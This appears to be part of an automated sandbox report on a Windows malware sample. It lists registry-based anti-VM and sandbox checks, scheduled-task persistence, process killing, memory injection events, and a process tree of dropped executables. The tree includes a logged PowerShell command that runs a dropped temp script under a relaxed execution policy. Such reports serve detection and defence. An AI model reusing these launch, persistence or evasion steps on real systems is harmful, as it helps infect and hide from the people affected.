description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TaVOM7x.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 33f82ae2b0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MAl7pjE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language afaefd507f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1cc9b19df2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 54352f7f9d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 85e559204e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7aencsM.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ebp51gY.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 6349023c59.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d35ce9d381.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DTQCxXZ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7nSTXG6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bjkm5hE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d74640f13d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7aencsM.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 67152b305c.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 54352f7f9d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bjkm5hE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bjkm5hE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1e56a29b0d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 26da168d66.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 6349023c59.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DTQCxXZ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sHN20me.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b91b4b1726.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7nSTXG6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d2YQIJa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 13Z5sqy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jonbDes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5a903ed074.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ebp51gY.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe -
Checks processor information in registry 2 TTPs 20 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 7aencsM.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 7aencsM.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 7aencsM.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 1cc9b19df2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString BitLockerToGo.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 7aencsM.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString BitLockerToGo.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 BitLockerToGo.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 1cc9b19df2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 BitLockerToGo.exe -
Delays execution with timeout.exe 3 IoCs
pid Process 3264 timeout.exe 1392 timeout.exe 660 timeout.exe -
Enumerates system info in registry 2 TTPs 21 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe -
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
description flow ioc HTTP User-Agent header 110 Go-http-client/1.1 -
Kills process with taskkill 5 IoCs
pid Process 4892 taskkill.exe 1016 taskkill.exe 5932 taskkill.exe 5660 taskkill.exe 1884 taskkill.exe -
Modifies data under HKEY_USERS 4 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133846159492247704" chrome.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe -
Modifies registry class 3 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" BackgroundTransferHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" BackgroundTransferHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix BackgroundTransferHost.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3776 schtasks.exe 5636 schtasks.exe 1908 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 5468 0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe 5468 0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe 4576 skotes.exe 4576 skotes.exe 1612 6349023c59.exe 1612 6349023c59.exe 1612 6349023c59.exe 1612 6349023c59.exe 1556 6349023c59.exe 1556 6349023c59.exe 1556 6349023c59.exe 1556 6349023c59.exe 3740 chrome.exe 3740 chrome.exe 3376 powershell.exe 3376 powershell.exe 3376 powershell.exe 5572 powershell.exe 5572 powershell.exe 5372 ViGgA8C.exe 5372 ViGgA8C.exe 5572 powershell.exe 568 powershell.exe 568 powershell.exe 568 powershell.exe 2556 DTQCxXZ.exe 2556 DTQCxXZ.exe 2556 DTQCxXZ.exe 2556 DTQCxXZ.exe 5372 ViGgA8C.exe 5372 ViGgA8C.exe 5372 ViGgA8C.exe 4104 d2YQIJa.exe 4104 d2YQIJa.exe 4104 d2YQIJa.exe 4104 d2YQIJa.exe 4104 d2YQIJa.exe 4104 d2YQIJa.exe 2104 sHN20me.exe 2104 sHN20me.exe 3912 spoDnGT.exe 3912 spoDnGT.exe 3912 spoDnGT.exe 3912 spoDnGT.exe 3912 spoDnGT.exe 3912 spoDnGT.exe 3992 skotes.exe 3992 skotes.exe 1952 MAl7pjE.exe 1952 MAl7pjE.exe 1952 MAl7pjE.exe 1952 MAl7pjE.exe 1952 MAl7pjE.exe 1952 MAl7pjE.exe 1484 lwtLxxH.exe 1484 lwtLxxH.exe 3804 7aencsM.exe 3804 7aencsM.exe 3804 7aencsM.exe 3804 7aencsM.exe 1484 lwtLxxH.exe 1484 lwtLxxH.exe 1616 chrome.exe 1616 chrome.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 25 IoCs
pid Process 3740 chrome.exe 3740 chrome.exe 3740 chrome.exe 1616 chrome.exe 1616 chrome.exe 1616 chrome.exe 1616 chrome.exe 2332 chrome.exe 2332 chrome.exe 2332 chrome.exe 2332 chrome.exe 3264 msedge.exe 3264 msedge.exe 3264 msedge.exe 3264 msedge.exe 5488 chrome.exe 5488 chrome.exe 5488 chrome.exe 5488 chrome.exe 2268 msedge.exe 2268 msedge.exe 6036 msedge.exe 6036 msedge.exe 6036 msedge.exe 6036 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 3740 chrome.exe Token: SeCreatePagefilePrivilege 3740 chrome.exe Token: SeShutdownPrivilege 3740 chrome.exe Token: SeCreatePagefilePrivilege 3740 chrome.exe Token: SeShutdownPrivilege 3740 chrome.exe Token: SeCreatePagefilePrivilege 3740 chrome.exe Token: SeShutdownPrivilege 3740 chrome.exe Token: SeCreatePagefilePrivilege 3740 chrome.exe Token: SeShutdownPrivilege 3740 chrome.exe Token: SeCreatePagefilePrivilege 3740 chrome.exe Token: SeShutdownPrivilege 3740 chrome.exe Token: SeCreatePagefilePrivilege 3740 chrome.exe Token: SeShutdownPrivilege 3740 chrome.exe Token: SeCreatePagefilePrivilege 3740 chrome.exe Token: SeDebugPrivilege 3376 powershell.exe Token: SeDebugPrivilege 5572 powershell.exe Token: SeDebugPrivilege 5372 ViGgA8C.exe Token: SeDebugPrivilege 568 powershell.exe Token: SeDebugPrivilege 1484 lwtLxxH.exe Token: SeShutdownPrivilege 1616 chrome.exe Token: SeCreatePagefilePrivilege 1616 chrome.exe Token: SeShutdownPrivilege 1616 chrome.exe Token: SeCreatePagefilePrivilege 1616 chrome.exe Token: SeDebugPrivilege 3696 powershell.exe Token: SeDebugPrivilege 4512 powershell.exe Token: SeDebugPrivilege 1560 TempMCYO79ALDPNWN9ZE4EQAADYOVROJEOXB.EXE Token: SeDebugPrivilege 4812 powershell.exe Token: SeShutdownPrivilege 2332 chrome.exe Token: SeCreatePagefilePrivilege 2332 chrome.exe Token: SeShutdownPrivilege 2332 chrome.exe Token: SeCreatePagefilePrivilege 2332 chrome.exe Token: SeDebugPrivilege 72 powershell.exe Token: SeShutdownPrivilege 2332 chrome.exe Token: SeCreatePagefilePrivilege 2332 chrome.exe Token: SeDebugPrivilege 5804 powershell.exe Token: SeShutdownPrivilege 2332 chrome.exe Token: SeCreatePagefilePrivilege 2332 chrome.exe Token: SeShutdownPrivilege 2332 chrome.exe Token: SeCreatePagefilePrivilege 2332 chrome.exe Token: SeShutdownPrivilege 2332 chrome.exe Token: SeCreatePagefilePrivilege 2332 chrome.exe Token: SeShutdownPrivilege 2332 chrome.exe Token: SeCreatePagefilePrivilege 2332 chrome.exe Token: SeDebugPrivilege 1076 d35ce9d381.exe Token: SeShutdownPrivilege 5488 chrome.exe Token: SeCreatePagefilePrivilege 5488 chrome.exe Token: SeShutdownPrivilege 5488 chrome.exe Token: SeCreatePagefilePrivilege 5488 chrome.exe Token: SeShutdownPrivilege 5488 chrome.exe Token: SeCreatePagefilePrivilege 5488 chrome.exe Token: SeShutdownPrivilege 5488 chrome.exe Token: SeCreatePagefilePrivilege 5488 chrome.exe Token: SeShutdownPrivilege 5488 chrome.exe Token: SeCreatePagefilePrivilege 5488 chrome.exe Token: SeShutdownPrivilege 5488 chrome.exe Token: SeCreatePagefilePrivilege 5488 chrome.exe Token: SeShutdownPrivilege 5488 chrome.exe Token: SeCreatePagefilePrivilege 5488 chrome.exe Token: SeDebugPrivilege 1884 taskkill.exe Token: SeDebugPrivilege 4892 taskkill.exe Token: SeDebugPrivilege 1016 taskkill.exe Token: SeDebugPrivilege 5932 taskkill.exe Token: SeDebugPrivilege 1996 powershell.exe Token: SeDebugPrivilege 5660 taskkill.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 5468 0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe 3740 chrome.exe 3740 chrome.exe 3740 chrome.exe 3740 chrome.exe 3740 chrome.exe 3740 chrome.exe 3740 chrome.exe 3740 chrome.exe 3740 chrome.exe 3740 chrome.exe 3740 chrome.exe 3740 chrome.exe 3740 chrome.exe 3740 chrome.exe 3740 chrome.exe 3740 chrome.exe 3740 chrome.exe 3740 chrome.exe 3740 chrome.exe 3740 chrome.exe 3740 chrome.exe 3740 chrome.exe 3740 chrome.exe 3740 chrome.exe 3740 chrome.exe 3740 chrome.exe 3740 chrome.exe 1616 chrome.exe 1616 chrome.exe 1616 chrome.exe 1616 chrome.exe 1616 chrome.exe 1616 chrome.exe 1616 chrome.exe 1616 chrome.exe 1616 chrome.exe 1616 chrome.exe 1616 chrome.exe 1616 chrome.exe 1616 chrome.exe 1616 chrome.exe 1616 chrome.exe 1616 chrome.exe 1616 chrome.exe 1616 chrome.exe 1616 chrome.exe 1616 chrome.exe 1616 chrome.exe 1616 chrome.exe 1616 chrome.exe 1616 chrome.exe 1616 chrome.exe 1616 chrome.exe 3172 c9aa4cecce.exe 3172 c9aa4cecce.exe 3172 c9aa4cecce.exe 2332 chrome.exe 2332 chrome.exe 2332 chrome.exe 2332 chrome.exe 2332 chrome.exe 2332 chrome.exe 2332 chrome.exe -
Suspicious use of SendNotifyMessage 29 IoCs
pid Process 3740 chrome.exe 3740 chrome.exe 3740 chrome.exe 3740 chrome.exe 3740 chrome.exe 3740 chrome.exe 3740 chrome.exe 3740 chrome.exe 3740 chrome.exe 3740 chrome.exe 3740 chrome.exe 3740 chrome.exe 3172 c9aa4cecce.exe 3172 c9aa4cecce.exe 3172 c9aa4cecce.exe 1752 54352f7f9d.exe 1752 54352f7f9d.exe 1752 54352f7f9d.exe 1752 54352f7f9d.exe 1752 54352f7f9d.exe 1752 54352f7f9d.exe 1404 85e559204e.exe 1404 85e559204e.exe 1404 85e559204e.exe 1752 54352f7f9d.exe 1752 54352f7f9d.exe 1752 54352f7f9d.exe 1752 54352f7f9d.exe 1752 54352f7f9d.exe -
Suspicious use of SetWindowsHookEx 19 IoCs
pid Process 912 firefox.exe 912 firefox.exe 912 firefox.exe 912 firefox.exe 912 firefox.exe 912 firefox.exe 912 firefox.exe 912 firefox.exe 912 firefox.exe 912 firefox.exe 912 firefox.exe 912 firefox.exe 912 firefox.exe 912 firefox.exe 912 firefox.exe 912 firefox.exe 912 firefox.exe 912 firefox.exe 912 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5468 wrote to memory of 4576 5468 0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe 82 PID 5468 wrote to memory of 4576 5468 0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe 82 PID 5468 wrote to memory of 4576 5468 0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe 82 PID 4576 wrote to memory of 2832 4576 skotes.exe 83 PID 4576 wrote to memory of 2832 4576 skotes.exe 83 PID 4576 wrote to memory of 2832 4576 skotes.exe 83 PID 2832 wrote to memory of 1556 2832 6349023c59.exe 85 PID 2832 wrote to memory of 1556 2832 6349023c59.exe 85 PID 2832 wrote to memory of 1556 2832 6349023c59.exe 85 PID 2832 wrote to memory of 1556 2832 6349023c59.exe 85 PID 2832 wrote to memory of 1556 2832 6349023c59.exe 85 PID 2832 wrote to memory of 1556 2832 6349023c59.exe 85 PID 2832 wrote to memory of 1556 2832 6349023c59.exe 85 PID 2832 wrote to memory of 1556 2832 6349023c59.exe 85 PID 2832 wrote to memory of 1556 2832 6349023c59.exe 85 PID 2832 wrote to memory of 5736 2832 6349023c59.exe 86 PID 2832 wrote to memory of 5736 2832 6349023c59.exe 86 PID 2832 wrote to memory of 5736 2832 6349023c59.exe 86 PID 2832 wrote to memory of 1612 2832 6349023c59.exe 87 PID 2832 wrote to memory of 1612 2832 6349023c59.exe 87 PID 2832 wrote to memory of 1612 2832 6349023c59.exe 87 PID 2832 wrote to memory of 1612 2832 6349023c59.exe 87 PID 2832 wrote to memory of 1612 2832 6349023c59.exe 87 PID 2832 wrote to memory of 1612 2832 6349023c59.exe 87 PID 2832 wrote to memory of 1612 2832 6349023c59.exe 87 PID 2832 wrote to memory of 1612 2832 6349023c59.exe 87 PID 2832 wrote to memory of 1612 2832 6349023c59.exe 87 PID 4576 wrote to memory of 3940 4576 skotes.exe 92 PID 4576 wrote to memory of 3940 4576 skotes.exe 92 PID 4576 wrote to memory of 3940 4576 skotes.exe 92 PID 3740 wrote to memory of 3628 3740 chrome.exe 96 PID 3740 wrote to memory of 3628 3740 chrome.exe 96 PID 3740 wrote to memory of 5524 3740 chrome.exe 97 PID 3740 wrote to memory of 5524 3740 chrome.exe 97 PID 3740 wrote to memory of 5524 3740 chrome.exe 97 PID 3740 wrote to memory of 5524 3740 chrome.exe 97 PID 3740 wrote to memory of 5524 3740 chrome.exe 97 PID 3740 wrote to memory of 5524 3740 chrome.exe 97 PID 3740 wrote to memory of 5524 3740 chrome.exe 97 PID 3740 wrote to memory of 5524 3740 chrome.exe 97 PID 3740 wrote to memory of 5524 3740 chrome.exe 97 PID 3740 wrote to memory of 5524 3740 chrome.exe 97 PID 3740 wrote to memory of 5524 3740 chrome.exe 97 PID 3740 wrote to memory of 5524 3740 chrome.exe 97 PID 3740 wrote to memory of 5524 3740 chrome.exe 97 PID 3740 wrote to memory of 5524 3740 chrome.exe 97 PID 3740 wrote to memory of 5524 3740 chrome.exe 97 PID 3740 wrote to memory of 5524 3740 chrome.exe 97 PID 3740 wrote to memory of 5524 3740 chrome.exe 97 PID 3740 wrote to memory of 5524 3740 chrome.exe 97 PID 3740 wrote to memory of 5524 3740 chrome.exe 97 PID 3740 wrote to memory of 5524 3740 chrome.exe 97 PID 3740 wrote to memory of 5524 3740 chrome.exe 97 PID 3740 wrote to memory of 5524 3740 chrome.exe 97 PID 3740 wrote to memory of 5524 3740 chrome.exe 97 PID 3740 wrote to memory of 5524 3740 chrome.exe 97 PID 3740 wrote to memory of 5524 3740 chrome.exe 97 PID 3740 wrote to memory of 5524 3740 chrome.exe 97 PID 3740 wrote to memory of 5524 3740 chrome.exe 97 PID 3740 wrote to memory of 5524 3740 chrome.exe 97 PID 3740 wrote to memory of 5524 3740 chrome.exe 97 PID 3740 wrote to memory of 5524 3740 chrome.exe 97 PID 3740 wrote to memory of 5308 3740 chrome.exe 98 PID 3740 wrote to memory of 5308 3740 chrome.exe 98 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe"C:\Users\Admin\AppData\Local\Temp\0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:5468 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4576 -
C:\Users\Admin\AppData\Local\Temp\1014060001\6349023c59.exe"C:\Users\Admin\AppData\Local\Temp\1014060001\6349023c59.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2832 -
C:\Users\Admin\AppData\Local\Temp\1014060001\6349023c59.exe"C:\Users\Admin\AppData\Local\Temp\1014060001\6349023c59.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1556
-
-
C:\Users\Admin\AppData\Local\Temp\1014060001\6349023c59.exe"C:\Users\Admin\AppData\Local\Temp\1014060001\6349023c59.exe"4⤵
- Executes dropped EXE
PID:5736
-
-
C:\Users\Admin\AppData\Local\Temp\1014060001\6349023c59.exe"C:\Users\Admin\AppData\Local\Temp\1014060001\6349023c59.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1612
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2832 -s 8284⤵
- Program crash
PID:1952
-
-
-
C:\Users\Admin\AppData\Local\Temp\1034761001\13Z5sqy.exe"C:\Users\Admin\AppData\Local\Temp\1034761001\13Z5sqy.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3940 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵PID:3332
-
-
-
C:\Users\Admin\AppData\Local\Temp\1039270001\jonbDes.exe"C:\Users\Admin\AppData\Local\Temp\1039270001\jonbDes.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1396
-
-
C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe"C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:852 -
C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe"C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2696
-
-
C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe"C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1672
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 852 -s 9844⤵
- Program crash
PID:1592
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1073578041\tYliuwV.ps1"3⤵
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- System Location Discovery: System Language Discovery
